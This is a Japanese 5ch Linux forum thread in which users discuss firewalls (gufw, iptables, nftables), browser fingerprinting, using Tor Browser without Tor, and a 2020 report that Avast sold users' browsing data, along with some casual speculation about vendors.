142: login:Penguin [sage] 2019/12/22(日) 05:32:17.57 ID:F7RmFDTN >>139 セキュリティは上がる、とは言える 最初はgufw,慣れればiptablesがおすすめ(FWというかネットワークの詳細なコントロールが出来る) 例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性 ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか?リッスン中のアプリに設定ミスや脆弱性は無いのか? FWはそういう可能性をカット出来る(公開する意図のない宛先には) 不要なアタックサーフェイスは狭めるのがセキュリティの基本 http://mao.5ch.net/test/read.cgi/linux/1465741067/142
143: login:Penguin [] 2019/12/22(日) 10:24:37.91 ID:QiAxui6d 小手先だけで、基礎の教養なしにubuntu を使っている小生には ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、 ご教示有難う存じました。 http://mao.5ch.net/test/read.cgi/linux/1465741067/143
144: login:Penguin [] 2019/12/23(月) 03:58:31.72 ID:fOOPeHWr >>134-135 Canvasってなんだっけ? CanvasってJavaScriptオフだと機能しないよね? 俺の勘違い? http://mao.5ch.net/test/read.cgi/linux/1465741067/144
145: login:Penguin [] 2019/12/23(月) 04:06:22.21 ID:fOOPeHWr Ubuntu18.04使用でブラウザはFirefox、Torbrowserしか入れてないわ Chromeは論外で他に選択しないからこの2つ以外入れてない Torスレでもなんか話題になってたけど、 普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの? TorBrowserもFirefox基盤だけど、 >>133の >デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる… にはなってないよね? なにせTorBrowserだし・・・ http://mao.5ch.net/test/read.cgi/linux/1465741067/145
146: login:Penguin [] 2019/12/23(月) 04:54:54.78 ID:fOOPeHWr >>131 >ubuntuにしてからは気軽に使えるsandboxが見当たらないんで >仮想マシンにZorin LiteとFirefoxだけ入れてzipして >やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる なんでこんなめんどくさいことしてるの? 普通にFirefoxの全履歴削除すれば全部消えるんじゃないの? UbuntuのJournalに履歴とか残るから? http://mao.5ch.net/test/read.cgi/linux/1465741067/146
147: login:Penguin [sage] 2019/12/23(月) 10:49:30.08 ID:1IWvct7N iptablesはもう古いよ これからはnftablesだよ http://mao.5ch.net/test/read.cgi/linux/1465741067/147
148: login:Penguin [sage] 2019/12/23(月) 12:05:01.09 ID:x1WXtyaO 履歴w http://mao.5ch.net/test/read.cgi/linux/1465741067/148
149: login:Penguin [sage] 2019/12/23(月) 17:23:14.88 ID:Y4WL5T53 Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか? http://mao.5ch.net/test/read.cgi/linux/1465741067/149
150: login:Penguin [sage] 2019/12/24(火) 11:41:20.66 ID:NeirOfqJ >>144 ここで言ってるのはfingerprinting技術 WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得(同時にIPや他情報もなるべく取得) その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得&追跡されるのが常だからな JSを切ればcanvasでは取れないような…?他もかなり良くなる >>145 利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う プロ?集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定&開発したんだ 公式でTor無しバージョンもリリースすれば良いのに もちろんGやテレメトリその他色々無効になってる(about:configで確認出来る) http://mao.5ch.net/test/read.cgi/linux/1465741067/150
151: login:Penguin [] 2020/01/28(火) 22:15:11.09 ID:zrSY3ZQs 無料ウイルス対策ソフトのアバストAvast、おまえらのネット閲覧データを販売か? [594632409] https://leia.5ch.net/test/read.cgi/poverty/1580177900/ 無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か Carrie Mihalcik (CNET News) 翻訳校正: 編集部2020年01月28日 11時07分 ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。 https://japan.cnet.com/article/35148566/ http://mao.5ch.net/test/read.cgi/linux/1465741067/151
152: login:Penguin [sage] 2020/01/28(火) 22:26:23.57 ID:msT/XQYC Linuxに関係あるんか? http://mao.5ch.net/test/read.cgi/linux/1465741067/152
153: login:Penguin [sage] 2020/01/28(火) 22:30:53.29 ID:meBmn7jU やはり、営利企業がリリースするウィルス対策ソフトには、 用心したほうがいいんでしょう。そもそもなにゆえ無料なのか… avast は Linux用もあるからね。 http://mao.5ch.net/test/read.cgi/linux/1465741067/153
154: login:Penguin [sage] 2020/01/28(火) 22:39:50.10 ID:msT/XQYC Linux版も無料なのか? http://mao.5ch.net/test/read.cgi/linux/1465741067/154
155: login:Penguin [sage] 2020/01/28(火) 22:49:55.26 ID:meBmn7jU >>154 今は知らんけど、過去にはあった。 http://mao.5ch.net/test/read.cgi/linux/1465741067/155
156: login:Penguin [sage] 2020/01/28(火) 22:52:43.99 ID:meBmn7jU CNET News 翻訳記事の中には、 「ユーザーのプライバシーと、当社の主力セキュリティ製品で必要なデータ利用とのバランスをとる責任」があることを理解し、重くとらえていると述べている。 と、こんな記事があるのね。これはGoogleの利用許諾とよく似ているねえ。 やはり、ビッグデータを収集したいわけだ。そうじゃなきゃ、無料はおかしい。 http://mao.5ch.net/test/read.cgi/linux/1465741067/156
157: login:Penguin [sage] 2020/01/28(火) 22:58:30.86 ID:msT/XQYC >>155 今はないとしたらほぼ影響はないか http://mao.5ch.net/test/read.cgi/linux/1465741067/157
158: login:Penguin [sage] 2020/01/28(火) 23:02:40.66 ID:meBmn7jU >>157 今ないのかどうかは知らないし、avast サイトをのぞきたくはないし。 http://mao.5ch.net/test/read.cgi/linux/1465741067/158
159: login:Penguin [sage] 2020/01/28(火) 23:07:56.07 ID:msT/XQYC >>158 検索するくらいは出来るでしょ なさそうだけど http://mao.5ch.net/test/read.cgi/linux/1465741067/159
160: login:Penguin [sage] 2020/01/28(火) 23:09:01.59 ID:YOaQ6DqC 数年前に中華資本になったんだっけ? http://mao.5ch.net/test/read.cgi/linux/1465741067/160
161: login:Penguin [sage] 2020/01/28(火) 23:10:35.37 ID:meBmn7jU avast とは関わりたくないから。 http://mao.5ch.net/test/read.cgi/linux/1465741067/161
162: login:Penguin [sage] 2020/01/28(火) 23:14:54.44 ID:msT/XQYC 別に責めてるわけじゃないからね ただ話膨らませるなら検索くらいしなよ http://mao.5ch.net/test/read.cgi/linux/1465741067/162
163: login:Penguin [] 2020/01/29(水) 00:38:40.10 ID:FX+veRBJ avastって中華になってたのかよw ロシアと中華マジスゲエなあ Linux関係ないけど、androidの中華作成のVirtual exposedってのも ウイルスてんこ盛りらしいから気をつけてな http://mao.5ch.net/test/read.cgi/linux/1465741067/163
164: login:Penguin [sage] 2020/01/29(水) 08:40:01.61 ID:QKw1rI8u まじかよ つい先日レノボの Rayzen ノート買っちまったよ http://mao.5ch.net/test/read.cgi/linux/1465741067/164
165: login:Penguin [sage] 2020/01/29(水) 09:38:52.68 ID:d7wE0hb8 >>164 レノボは中共製で知られているが、個人データを密かに送信してるんじゃないかと かなり前に騒がれたが、今ではその話題は見かけないようになった。 http://mao.5ch.net/test/read.cgi/linux/1465741067/165
166: login:Penguin [sage] 2020/01/29(水) 09:48:03.97 ID:d7wE0hb8 >>162 じゃ、話しを膨らませてあげるよ。 皆さん、結構関心あったと思うけど。何人も、avast 使ってウイルス対策していたよ。 このソフトは、無料なのに使いやすかったからなあ。 http://mao.5ch.net/test/read.cgi/linux/1465741067/166
167: login:Penguin [sage] 2020/01/29(水) 09:51:50.83 ID:d7wE0hb8 アンチウイルス avast! Linux Home Edition https://mao.5ch.net/test/read.cgi/linux/1186329249/ この過去スレ、おもしろいよ。好奇心があるなら是非。 http://mao.5ch.net/test/read.cgi/linux/1465741067/167
メモ帳
(0/65535文字)
上
下
前
次
1-
新
書
関
写
板
覧
索
設
栞
歴
あと 302 レスあります
スレ情報
赤レス抽出
画像レス抽出
歴の未読スレ
AAサムネイル
Google検索
Wikipedia
ぬこの手
ぬこTOP
0.010s